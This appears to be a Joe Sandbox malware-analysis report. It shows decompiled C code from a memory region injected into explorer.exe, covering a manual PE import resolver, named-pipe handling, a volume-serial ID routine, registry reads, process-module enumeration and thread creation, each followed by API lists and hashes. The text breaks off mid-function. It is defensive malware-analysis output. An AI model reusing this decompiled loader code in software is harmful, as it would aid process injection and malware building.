                                                                                                                                                                        0x007a3847
                                                                                                                                                                        0x007a3823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a382e
                                                                                                                                                                        0x007a37e7
                                                                                                                                                                        0x007a3b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • ConnectNamedPipe.KERNELBASE(00000000), ref: 007A37A8
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007A37B2
                                                                                                                                                                          • Part of subcall function 007AD1A6: FlushFileBuffers.KERNEL32(000003C4,?,007A3AC6,00000000,00000004), ref: 007AD1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 007A3B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 2389948835-3858738763
                                                                                                                                                                        • Opcode ID: 858d9f3df7020b53b328a616b1c08c2f3e1e3552f2b041b00aae5b734f4a2a29
                                                                                                                                                                        • Instruction ID: 4d0b4fc592aba4f6aee9104276c02f0392bdd85a8f58846ce3172d8c54a85f46
                                                                                                                                                                        • Opcode Fuzzy Hash: 858d9f3df7020b53b328a616b1c08c2f3e1e3552f2b041b00aae5b734f4a2a29
                                                                                                                                                                        • Instruction Fuzzy Hash: E6A1C3B2508301AFE314DF64D889E6BB7E8EBC6314F408B1EF19596181DB7CDA04CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 218 7b370b-7b3719 219 7b371b-7b371e 218->219 220 7b3723-7b3763 GetModuleHandleA call 7aefa7 218->220 221 7b38d0-7b38d1 219->221 224 7b3769-7b3780 220->224 225 7b38ce 220->225 226 7b3783-7b378a 224->226 225->221 227 7b378c-7b3795 226->227 228 7b3797-7b37a7 226->228 227->226 229 7b37aa-7b37b1 228->229 229->225 230 7b37b7-7b37ce LoadLibraryA 229->230 231 7b37d8-7b37de 230->231 232 7b37d0-7b37d3 230->232 233 7b37ed-7b37f6 231->233 234 7b37e0-7b37eb 231->234 232->221 235 7b37f9 233->235 234->235 236 7b37fd-7b3803 235->236 237 7b3809-7b3821 236->237 238 7b38c0-7b38c9 236->238 239 7b3823-7b3842 237->239 240 7b3844-7b3872 237->240 238->229 243 7b3875-7b387b 239->243 240->243 244 7b38a9-7b38bb 243->244 245 7b387d-7b388b 243->245 244->236 246 7b388d-7b389f 245->246 247 7b38a1-7b38a7 245->247 246->244 247->244
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E007B370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E007AEFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}
























                                                                                                                                                                        0x007b370b
                                                                                                                                                                        0x007b3711
                                                                                                                                                                        0x007b3719
                                                                                                                                                                        0x007b372e
                                                                                                                                                                        0x007b3740
                                                                                                                                                                        0x007b374c
                                                                                                                                                                        0x007b3752
                                                                                                                                                                        0x007b3757
                                                                                                                                                                        0x007b3763
                                                                                                                                                                        0x007b38ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b38ce
                                                                                                                                                                        0x007b3769
                                                                                                                                                                        0x007b3772
                                                                                                                                                                        0x007b3780
                                                                                                                                                                        0x007b3783
                                                                                                                                                                        0x007b3792
                                                                                                                                                                        0x007b3792
                                                                                                                                                                        0x007b3799
                                                                                                                                                                        0x007b37a7
                                                                                                                                                                        0x007b37aa
                                                                                                                                                                        0x007b37c1
                                                                                                                                                                        0x007b37c7
                                                                                                                                                                        0x007b37ce
                                                                                                                                                                        0x007b37de
                                                                                                                                                                        0x007b37f6
                                                                                                                                                                        0x007b37e0
                                                                                                                                                                        0x007b37e8
                                                                                                                                                                        0x007b37e8
                                                                                                                                                                        0x007b37f9
                                                                                                                                                                        0x007b37fd
                                                                                                                                                                        0x007b3809
                                                                                                                                                                        0x007b380d
                                                                                                                                                                        0x007b3811
                                                                                                                                                                        0x007b3815
                                                                                                                                                                        0x007b3821
                                                                                                                                                                        0x007b384c
                                                                                                                                                                        0x007b3854
                                                                                                                                                                        0x007b3866
                                                                                                                                                                        0x007b3872
                                                                                                                                                                        0x007b3823
                                                                                                                                                                        0x007b3828
                                                                                                                                                                        0x007b3833
                                                                                                                                                                        0x007b383f
                                                                                                                                                                        0x007b383f
                                                                                                                                                                        0x007b387b
                                                                                                                                                                        0x007b3881
                                                                                                                                                                        0x007b388b
                                                                                                                                                                        0x007b38a7
                                                                                                                                                                        0x007b388d
                                                                                                                                                                        0x007b389c
                                                                                                                                                                        0x007b389c
                                                                                                                                                                        0x007b388b
                                                                                                                                                                        0x007b38af
                                                                                                                                                                        0x007b38b8
                                                                                                                                                                        0x007b38b8
                                                                                                                                                                        0x007b38c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b38c6
                                                                                                                                                                        0x007b37d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b37d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b37aa
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 007B3728
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000), ref: 007B37C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: 12f1a5ca6d3373ff4fe1a67b49c16042bc258c2a85929546ee123cba16140ad0
                                                                                                                                                                        • Instruction ID: f230a1508378699a01b06f457c51019b473eb14de485c191a5139b929cc678ea
                                                                                                                                                                        • Opcode Fuzzy Hash: 12f1a5ca6d3373ff4fe1a67b49c16042bc258c2a85929546ee123cba16140ad0
                                                                                                                                                                        • Instruction Fuzzy Hash: 72616DB5D00209EFDB00CF98C885BEDBBF1BF48315F248599E915AB291D778AA80DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AC5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E007AC5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E007A8D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x7bf818; // 0xeaf6c8
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E007A9DF2(_t44, 0xad6); // executed
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E007A8BAF( &_v16);
				_t33 = E007AA456(_t43);
				E007A9E51( &(_t43[E007AA456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E007AA456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E007AE2C5(_t43, E007AA456(_t43) + _t40, 0);
			}
















                                                                                                                                                                        0x007ac5ec
                                                                                                                                                                        0x007ac5f5
                                                                                                                                                                        0x007ac601
                                                                                                                                                                        0x007ac607
                                                                                                                                                                        0x007ac609
                                                                                                                                                                        0x007ac611
                                                                                                                                                                        0x007ac61f
                                                                                                                                                                        0x007ac624
                                                                                                                                                                        0x007ac633
                                                                                                                                                                        0x007ac63e
                                                                                                                                                                        0x007ac64b
                                                                                                                                                                        0x007ac665
                                                                                                                                                                        0x007ac66a
                                                                                                                                                                        0x007ac66c
                                                                                                                                                                        0x007ac673
                                                                                                                                                                        0x007ac683
                                                                                                                                                                        0x007ac694
                                                                                                                                                                        0x007ac69e
                                                                                                                                                                        0x007ac6a6
                                                                                                                                                                        0x007ac6ad
                                                                                                                                                                        0x007ac6b0
                                                                                                                                                                        0x007ac6cd

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 007AC633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 007AC665
                                                                                                                                                                          • Part of subcall function 007A9E51: _vsnwprintf.MSVCRT ref: 007A9E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 007AC69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 007AC6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 8695bbca61c1d11a8629cc55bb02b6cec79c9983c2e80c3a69a76ff0bcc8d674
                                                                                                                                                                        • Instruction ID: cd4b0217851d163214367ec232570ad24b208e128c26cc39eeff71c717cc2b26
                                                                                                                                                                        • Opcode Fuzzy Hash: 8695bbca61c1d11a8629cc55bb02b6cec79c9983c2e80c3a69a76ff0bcc8d674
                                                                                                                                                                        • Instruction Fuzzy Hash: 99214CB2900114FFDB10ABA4DC4EFEE77BCDB85310F108665F605D6181EA785E44C765
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ACDC3 Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 268 7acdc3-7acdf2 RegOpenKeyExW 269 7acdf8-7ace16 RegQueryValueExW 268->269 270 7acdf4-7acdf6 268->270 272 7ace18-7ace28 call 7a8bde 269->272 273 7ace53-7ace56 269->273 271 7ace66-7ace68 270->271 272->273 279 7ace2a-7ace44 RegQueryValueExW 272->279 274 7ace58-7ace5d 273->274 275 7ace63 273->275 274->275 277 7ace65 275->277 277->271 280 7ace69-7ace76 RegCloseKey 279->280 281 7ace46-7ace52 call 7a8bf4 279->281 280->277 281->273
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007ACDC3(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x7bf820; // 0xeaf8b8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E007A8BDE(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E007A8BF4( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










                                                                                                                                                                        0x007acde1
                                                                                                                                                                        0x007acde4
                                                                                                                                                                        0x007acde7
                                                                                                                                                                        0x007acdf2
                                                                                                                                                                        0x007ace16
                                                                                                                                                                        0x007ace53
                                                                                                                                                                        0x007ace56
                                                                                                                                                                        0x007ace58
                                                                                                                                                                        0x007ace60
                                                                                                                                                                        0x007ace60
                                                                                                                                                                        0x007ace63
                                                                                                                                                                        0x007ace65
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ace65
                                                                                                                                                                        0x007ace20
                                                                                                                                                                        0x007ace22
                                                                                                                                                                        0x007ace28
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ace44
                                                                                                                                                                        0x007ace71
                                                                                                                                                                        0x007ace74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ace74
                                                                                                                                                                        0x007ace4c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ace52
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000000,00000000,?,?,007A30F8,00000000), ref: 007ACDEA
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,007A30F8,00000000,?,00000000,007A30F8,00000000,?,?,007A30F8,00000000), ref: 007ACE0E
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,007A30F8,00000000,00000000,00000000,007A30F8,?,?,007A30F8,00000000), ref: 007ACE3C
                                                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,007A30F8,00000000,?,?,?,?,?,?,?,000003D5,?), ref: 007ACE71
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586453840-0
                                                                                                                                                                        • Opcode ID: eb625c97c5544b2254737fc17d961b115af35adad9d0ee1d6c8b75c7bc162e3c
                                                                                                                                                                        • Instruction ID: bd98f0f9f16d336d55d8de61bbc0776ed1bb09e379b4e2f5b65d6cf5b35e37cd
                                                                                                                                                                        • Opcode Fuzzy Hash: eb625c97c5544b2254737fc17d961b115af35adad9d0ee1d6c8b75c7bc162e3c
                                                                                                                                                                        • Instruction Fuzzy Hash: 02211A76904118FFDB11DFA9DC48EAEBBF8FF89B00B1442A9F505E6120D7359A00DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB8A7 Relevance: 6.1, APIs: 4, Instructions: 71processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 284 7ab8a7-7ab8b5 285 7ab8bf-7ab8d0 CreateToolhelp32Snapshot 284->285 286 7ab8b7-7ab8ba 284->286 288 7ab8dc-7ab90d call 7a8d6d Module32First 285->288 289 7ab8d2-7ab8da GetLastError 285->289 287 7ab967-7ab969 286->287 294 7ab90f-7ab918 288->294 295 7ab91d-7ab937 call 7a95d7 call 7aa05c 288->295 290 7ab91a-7ab91b 289->290 292 7ab966 290->292 292->287 294->290 301 7ab95a-7ab965 295->301 302 7ab939-7ab94b 295->302 301->292 302->295 305 7ab94d-7ab958 FindCloseChangeNotification 302->305 305->292
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E007AB8A7(signed int __eax, void* __ebx, int __ecx, void* __edx) {
				char _v520;
				void* _v552;
				intOrPtr _t23;
				void* _t26;
				intOrPtr _t28;
				intOrPtr _t32;
				void* _t44;
				void* _t46;

				_t44 = __edx;
				if(__ecx != 0) {
					_t46 = CreateToolhelp32Snapshot(8, __ecx);
					if(_t46 != 0xffffffff) {
						E007A8D6D( &_v552, 0, 0x224);
						_v552 = 0x224;
						if(Module32First(_t46,  &_v552) != 0) {
							while(1) {
								E007A95D7( &_v520);
								if(E007AA05C( &_v520, _t44) == 0) {
									break;
								}
								_push( &_v552);
								_t28 =  *0x7bf818; // 0xeaf6c8
								_push(_t46);
								if( *((intOrPtr*)(_t28 + 0x1c))() != 0) {
									continue;
								}
								FindCloseChangeNotification(_t46);
								_t26 = 0;
								L11:
								return _t26;
							}
							_t23 =  *0x7bf818; // 0xeaf6c8
							 *((intOrPtr*)(_t23 + 0x30))(_t46);
							_t26 = 1;
							goto L11;
						}
						_t32 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t32 + 0x30))(_t46);
						_push(0xfffffffd);
						L6:
						_pop(_t26);
						goto L11;
					}
					GetLastError();
					_push(0xfffffffe);
					goto L6;
				}
				return __eax | 0xffffffff;
			}











                                                                                                                                                                        0x007ab8b1
                                                                                                                                                                        0x007ab8b5
                                                                                                                                                                        0x007ab8cb
                                                                                                                                                                        0x007ab8d0
                                                                                                                                                                        0x007ab8ec
                                                                                                                                                                        0x007ab8f4
                                                                                                                                                                        0x007ab90d
                                                                                                                                                                        0x007ab91d
                                                                                                                                                                        0x007ab923
                                                                                                                                                                        0x007ab937
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab93f
                                                                                                                                                                        0x007ab940
                                                                                                                                                                        0x007ab945
                                                                                                                                                                        0x007ab94b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab953
                                                                                                                                                                        0x007ab956
                                                                                                                                                                        0x007ab966
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab966
                                                                                                                                                                        0x007ab95a
                                                                                                                                                                        0x007ab960
                                                                                                                                                                        0x007ab965
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab965
                                                                                                                                                                        0x007ab90f
                                                                                                                                                                        0x007ab915
                                                                                                                                                                        0x007ab918
                                                                                                                                                                        0x007ab91a
                                                                                                                                                                        0x007ab91a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab91a
                                                                                                                                                                        0x007ab8d2
                                                                                                                                                                        0x007ab8d8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab8d8
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008), ref: 007AB8C8
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007AB8D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateErrorLastSnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4136412728-0
                                                                                                                                                                        • Opcode ID: 84dff50771563ea1f70c198a46f4e96095cee6d72cd2bd0a80b0569f9647352b
                                                                                                                                                                        • Instruction ID: 129db5e1b74a441c269e1b179db4063c7897ae9b6cf4b4843f62dc395f92738b
                                                                                                                                                                        • Opcode Fuzzy Hash: 84dff50771563ea1f70c198a46f4e96095cee6d72cd2bd0a80b0569f9647352b
                                                                                                                                                                        • Instruction Fuzzy Hash: 46215471500515EFC710ABA8FC49EDA77E8AF8D314F1043B0F625D71A2D738EA418B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ACD27 Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 306 7acd27-7acd4f RegOpenKeyExA 307 7acd51-7acd53 306->307 308 7acd55-7acd72 RegQueryValueExA 306->308 311 7acdbf-7acdc2 307->311 309 7acdad-7acdb0 308->309 310 7acd74-7acd83 call 7a8bde 308->310 313 7acdbd 309->313 314 7acdb2-7acdba RegCloseKey 309->314 310->309 316 7acd85-7acd9f RegQueryValueExA 310->316 313->311 314->313 316->309 317 7acda1-7acda6 316->317 317->309 318 7acda8-7acdab 317->318 318->309
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007ACD27(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E007A8BDE(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








                                                                                                                                                                        0x007acd3a
                                                                                                                                                                        0x007acd44
                                                                                                                                                                        0x007acd47
                                                                                                                                                                        0x007acd4f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acd51
                                                                                                                                                                        0x007acd58
                                                                                                                                                                        0x007acd72
                                                                                                                                                                        0x007acd7e
                                                                                                                                                                        0x007acd83
                                                                                                                                                                        0x007acda1
                                                                                                                                                                        0x007acda6
                                                                                                                                                                        0x007acdab
                                                                                                                                                                        0x007acdab
                                                                                                                                                                        0x007acda6
                                                                                                                                                                        0x007acd83
                                                                                                                                                                        0x007acdb0
                                                                                                                                                                        0x007acdba
                                                                                                                                                                        0x007acdba
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,00000000,00EAFA30,?,00000001), ref: 007ACD4A
                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000001,00000000,?,00000000,00000001,?,00000001), ref: 007ACD6D
                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000001,00000000,?,00000000,00000001,?,00000001), ref: 007ACD9A
                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00000001), ref: 007ACDBA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586453840-0
                                                                                                                                                                        • Opcode ID: da30c85091a41973e929b094b61e9ee0d8eee7dc2366abe4f3b7de652df34147
                                                                                                                                                                        • Instruction ID: 540033bdcb4da723d890ef8f99652fc1820f17bb78ba603df95242ae2657efeb
                                                                                                                                                                        • Opcode Fuzzy Hash: da30c85091a41973e929b094b61e9ee0d8eee7dc2366abe4f3b7de652df34147
                                                                                                                                                                        • Instruction Fuzzy Hash: 5321B675A00108BFDB21DFA9DC44DAEBFB8EB89744B1441A9F915DB224D735DA00DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AA205 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 319 7aa205-7aa225 call 7ab149 322 7aa22e-7aa237 319->322 323 7aa227-7aa229 319->323 325 7aa239-7aa23e 322->325 324 7aa39e-7aa3a0 323->324 326 7aa25e-7aa261 325->326 327 7aa240-7aa247 call 7aa145 325->327 329 7aa27b-7aa281 326->329 330 7aa263-7aa26d 326->330 336 7aa249-7aa259 call 7aa15b 327->336 337 7aa274-7aa279 327->337 333 7aa283-7aa2a0 call 7a8bde 329->333 334 7aa2c1-7aa2ca 329->334 330->325 332 7aa26f 330->332 338 7aa38f-7aa39d call 7ab165 332->338 333->338 344 7aa2a6-7aa2bf call 7a8cbb 333->344 335 7aa2ce-7aa32a call 7ab096 CreateThread 334->335 349 7aa32c-7aa344 335->349 350 7aa367-7aa382 SetThreadPriority call 7ab165 335->350 336->326 337->330 338->324 344->335 355 7aa346-7aa356 call 7a8bf4 349->355 356 7aa357-7aa365 call 7a8d6d 349->356 353 7aa387-7aa38d 350->353 353->338 355->356 356->338
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E007AA205(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				struct _SECURITY_ATTRIBUTES* _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				struct _SECURITY_ATTRIBUTES* _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t91;
